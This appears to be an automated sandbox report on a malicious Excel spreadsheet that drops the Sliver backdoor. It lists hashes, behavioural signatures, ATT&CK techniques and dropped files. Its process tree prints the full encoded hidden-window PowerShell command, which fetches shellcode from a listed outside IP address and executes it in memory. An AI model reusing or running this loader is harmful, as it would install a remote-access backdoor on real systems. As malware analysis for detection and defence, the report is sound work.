sliver | f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750

General

Target

f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls
Size

46KB
MD5

85805d0582f2ba6089e4fa5f1f15cc3e
SHA1

d39dbac127be08bfc857a6891eaa80fb6ef7d226
SHA256

f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750
SHA512

5145d6facb073f80d649f7fb316d4d72df04d0977f3fa026a4ba30023006b59055f1f966330b5dec87be9052059f98e8dedd9a072f2a5b596c1b446543426d08
SSDEEP

768:q4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:JSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	632	2156	powershell.exe	82

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/632-65-0x0000028C6D330000-0x0000028C6DDAE000-memory.dmp	SliverRAT_v2
behavioral2/memory/632-67-0x0000028C6E830000-0x0000028C6F316000-memory.dmp	SliverRAT_v2
behavioral2/memory/632-66-0x0000028C6E830000-0x0000028C6F316000-memory.dmp	SliverRAT_v2
behavioral2/memory/632-68-0x0000028C6E830000-0x0000028C6F316000-memory.dmp	SliverRAT_v2
behavioral2/memory/632-69-0x0000028C6E830000-0x0000028C6F316000-memory.dmp	SliverRAT_v2
behavioral2/memory/632-80-0x0000028C6E830000-0x0000028C6F316000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 25 IoCs

Processes:

powershell.exe

flow	pid	Process
24	632	powershell.exe
25	632	powershell.exe
28	632	powershell.exe
33	632	powershell.exe
36	632	powershell.exe
37	632	powershell.exe
40	632	powershell.exe
41	632	powershell.exe
42	632	powershell.exe
43	632	powershell.exe
44	632	powershell.exe
45	632	powershell.exe
46	632	powershell.exe
47	632	powershell.exe
60	632	powershell.exe
61	632	powershell.exe
62	632	powershell.exe
63	632	powershell.exe
64	632	powershell.exe
65	632	powershell.exe
66	632	powershell.exe
67	632	powershell.exe
68	632	powershell.exe
69	632	powershell.exe
70	632	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
632	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
2156	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid	Process
632	powershell.exe
632	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	632	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	Process
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE
2156	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	Process	procid_target
PID 2156 wrote to memory of 632	2156	EXCEL.EXE	86
PID 2156 wrote to memory of 632	2156	EXCEL.EXE	86
PID 632 wrote to memory of 4964	632	powershell.exe	90
PID 632 wrote to memory of 4964	632	powershell.exe	90
PID 4964 wrote to memory of 3104	4964	csc.exe	91
PID 4964 wrote to memory of 3104	4964	csc.exe	91

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79C4.tmp" "c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\CSC10AE9CB6BFF74E9F9A7E3E47CB7F897F.TMP"
      4⤵
      PID:3104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES79C4.tmp

Filesize
1KB

MD5
7e0abd51747736297feda76c250d26d3

SHA1
d8fda7de6883d85f2cd1d844a3defb56a954c0df

SHA256
90a44cf74b8a3670e19e70f7df95eecd92073b37a3d41a2c8d7167865f1ecffa

SHA512
adb6a338c71968236db0cad8aab12ff6d459caf64d0ba50f56c34b5c1f09fb2c37c210aa520733675c1dbefdb76b56e9f81e77e6bb7815f091538916653d9da8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3u3mv11f.e1c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.dll

Filesize
3KB

MD5
816da5b1a7277b7172992a4659047720

SHA1
a06ba4aa3c81f5fe92b75d377320fc4c672c6e5f

SHA256
71558b1fd2df5e7535a37740dc864738825db58a688693fabcd12a90298192a4

SHA512
4124175d416aeb126d1589d2900e76a7193b029cc12b15536cc95ef910f782a90c8dfa65dfd0486f3464f4c1aa01dd93096c1bf400ce6ce2bd4da998ed4a80bb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
2KB

MD5
05e79935dc65b602002c4c27f265e96d

SHA1
c40e8392e84405bf8cc64beb0afc0bce95c02143

SHA256
405411e2fe9298412c0e211bf38cd51f3686c379d2262f04b2be5697cf30b877

SHA512
08b52937cb368759ff1669f7e8476882083fd34f04143916b99411eb11c1e04a687fd49752c26b48d6d3dc41e0461b47d6182ee7e2d7e69515aaf7a61c095704

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\CSC10AE9CB6BFF74E9F9A7E3E47CB7F897F.TMP

Filesize
652B

MD5
458027e9cfdde1ffdac4e1387777fcf7

SHA1
cff3315ea3f37f8c461cfc198ad43f64e704567c

SHA256
c72c9893355ab3f80a6944088df41221f441884cfe8fef6e01485e2b7c3266b4

SHA512
8823b0e5a0ff9f528fd5d42c6a37f651ea267664cbe220c0c2baa6936477b5d193d1706d371173adab9e0c335ee68fd06dcb26aab38b5f4beb59c3d6481f499c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.cmdline

Filesize
369B

MD5
c54b1847205e6289c4fad1c22fbbefe8

SHA1
58163628023bebaf23739ef66cdcc21f52dff0fe

SHA256
edb37127d3d01af43cc4c319f570bff7c684bee90c03b7d99150e4c63b7ef3cf

SHA512
5b016557261cecf6ee214b2a362c2c73627b9936233c82394d56d05d5bbb8025bf1b41780126be5f9835ebd249318212c4a87ca2ea8effaa12568c4e67e26cdf

Download Submit
memory/632-69-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

Filesize
10.9MB

Download
memory/632-59-0x0000028C6C420000-0x0000028C6C428000-memory.dmp

Filesize
32KB

Download
memory/632-65-0x0000028C6D330000-0x0000028C6DDAE000-memory.dmp

Filesize
10.5MB

Download
memory/632-67-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

Filesize
10.9MB

Download
memory/632-66-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

Filesize
10.9MB

Download
memory/632-68-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

Filesize
10.9MB

Download
memory/632-80-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

Filesize
10.9MB

Download
memory/632-46-0x0000028C6CB80000-0x0000028C6CBA2000-memory.dmp

Filesize
136KB

Download
memory/2156-12-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-13-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-21-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-20-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-19-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-18-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-17-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-31-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-30-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-15-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

Filesize
64KB

Download
memory/2156-6-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-10-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-14-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

Filesize
64KB

Download
memory/2156-16-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-5-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

Filesize
64KB

Download
memory/2156-11-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-7-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-63-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-64-0x00007FF819E6D000-0x00007FF819E6E000-memory.dmp

Filesize
4KB

Download
memory/2156-8-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-9-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-0-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

Filesize
64KB

Download
memory/2156-1-0x00007FF819E6D000-0x00007FF819E6E000-memory.dmp

Filesize
4KB

Download
memory/2156-2-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

Filesize
64KB

Download
memory/2156-3-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

Filesize
64KB

Download
memory/2156-78-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

Filesize
2.0MB

Download
memory/2156-4-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads